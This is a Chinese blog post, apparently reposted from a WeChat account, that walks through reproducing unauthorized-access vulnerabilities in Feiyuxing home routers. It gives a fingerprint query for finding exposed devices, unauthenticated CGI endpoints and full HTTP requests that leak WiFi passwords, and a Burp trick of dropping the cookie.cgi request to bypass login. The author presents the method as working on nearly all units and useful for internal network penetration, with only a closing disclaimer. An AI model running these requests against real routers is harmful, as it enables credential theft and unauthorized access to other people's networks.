一.漏洞背景
前几天拿 飞鱼星做了个暴力破解,后来通过网络查找发现,有越权漏洞,看来是我孤陋寡闻了,所以特意做个笔记,分享给大家,知道了的师傅看看就好。不知道的咱们一起来复现,路由器好复现,因为很少人会去更新固件
。咱们开始吧。
漏洞复现
title="飞鱼星家用智能路由"漏洞1.未授权访问
/request_para.cgi?parameter=wifi_info #获取 WIFI账号密码/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码
GET /request_para.cgi?parameter=wifi_info HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://xxx.xxx.xxx.xxx/index.html
漏洞2
访问index.html,然后⽤burp抓包drop掉cookie.cgi这个包访问index.html,
GET /cookie.cgi HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://xxx.xxx.xxx.xxx/index.html
然后⽤burp抓包drop掉cookie.cgi这个包 (就是点下drop)
访问后获取权限
大概就是这样了。先记录下来哈。没有poc这个比较简单 几乎是通杀哈,目前为止是这样 所以还是有必要记下来一下的 一直致力于路由器这块的原因,在此说下 还是为了内网渗透必备的。当没办法进去的时候试试路由器。
特别声明:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。
作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考
我不会渗透,我们下次再见!
原文始发于微信公众号(深夜笔记本):飞鱼星智能路由漏洞合集
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论